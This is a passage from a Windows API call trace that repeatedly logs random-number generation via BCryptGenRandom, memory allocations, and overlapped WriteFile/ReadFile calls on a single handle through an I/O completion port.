lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.230] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.241] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x113, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.241] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.241] CloseHandle (hObject=0x3cc) returned 1 [0204.242] free (_Block=0x3df0008) [0204.242] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.251] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.252] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.252] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.252] free (_Block=0x3e305b8) [0204.252] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.252] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.252] free (_Block=0x1fa91d0) [0204.252] free (_Block=0x1fa2ed8) [0204.252] free (_Block=0x1fa90b8) [0204.252] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.253] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.263] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x131, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.263] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.263] CloseHandle (hObject=0x3cc) returned 1 [0204.263] free (_Block=0x3df0008) [0204.263] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.324] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.325] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.325] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.326] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.326] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.326] free (_Block=0x3e305b8) [0204.326] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.326] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.326] free (_Block=0x1fa91d0) [0204.326] free (_Block=0x1fa2ed8) [0204.327] free (_Block=0x1fa90b8) [0204.327] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.327] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.327] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.327] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.338] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1a0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.339] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.339] CloseHandle (hObject=0x3cc) returned 1 [0204.339] free (_Block=0x3df0008) [0204.339] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.440] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.440] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.440] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.441] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.441] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.441] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.441] free (_Block=0x3e305b8) [0204.441] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.441] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.442] free (_Block=0x1fa91d0) [0204.442] free (_Block=0x1fa2ed8) [0204.442] free (_Block=0x1fa90b8) [0204.442] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.442] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.442] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.443] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.453] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.454] CloseHandle (hObject=0x3cc) returned 1 [0204.454] free (_Block=0x3df0008) [0204.454] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.463] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.463] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.463] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.464] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.464] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.464] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.464] free (_Block=0x3e305b8) [0204.464] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.464] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.465] free (_Block=0x1fa91d0) [0204.465] free (_Block=0x1fa2ed8) [0204.465] free (_Block=0x1fa90b8) [0204.465] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.466] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.466] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.477] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.477] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.477] CloseHandle (hObject=0x3cc) returned 1 [0204.477] free (_Block=0x3df0008) [0204.477] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.485] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.486] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.486] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.486] free (_Block=0x3e305b8) [0204.486] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.487] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.487] free (_Block=0x1fa91d0) [0204.487] free (_Block=0x1fa2ed8) [0204.487] free (_Block=0x1fa90b8) [0204.487] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.488] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.503] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.503] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.503] CloseHandle (hObject=0x3cc) returned 1 [0204.503] free (_Block=0x3df0008) [0204.503] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.512] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.513] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.513] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.513] free (_Block=0x3e305b8) [0204.513] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.513] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.514] free (_Block=0x1fa91d0) [0204.514] free (_Block=0x1fa2ed8) [0204.514] free (_Block=0x1fa90b8) [0204.514] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.514] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.515] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.525] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.526] CloseHandle (hObject=0x3cc) returned 1 [0204.526] free (_Block=0x3df0008) [0204.526] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.534] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.535] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.535] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.535] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.535] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.536] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.536] free (_Block=0x3e305b8) [0204.536] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.536] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.536] free (_Block=0x1fa91d0) [0204.536] free (_Block=0x1fa2ed8) [0204.536] free (_Block=0x1fa90b8) [0204.536] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.537] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.547] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.547] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.548] CloseHandle (hObject=0x3cc) returned 1 [0204.548] free (_Block=0x3df0008) [0204.548] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.555] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.556] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.556] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.556] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.557] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.557] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.557] free (_Block=0x3e305b8) [0204.557] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.557] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.557] free (_Block=0x1fa91d0) [0204.557] free (_Block=0x1fa2ed8) [0204.557] free (_Block=0x1fa90b8) [0204.557] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.558] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.558] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.558] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.576] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xaf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.576] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) 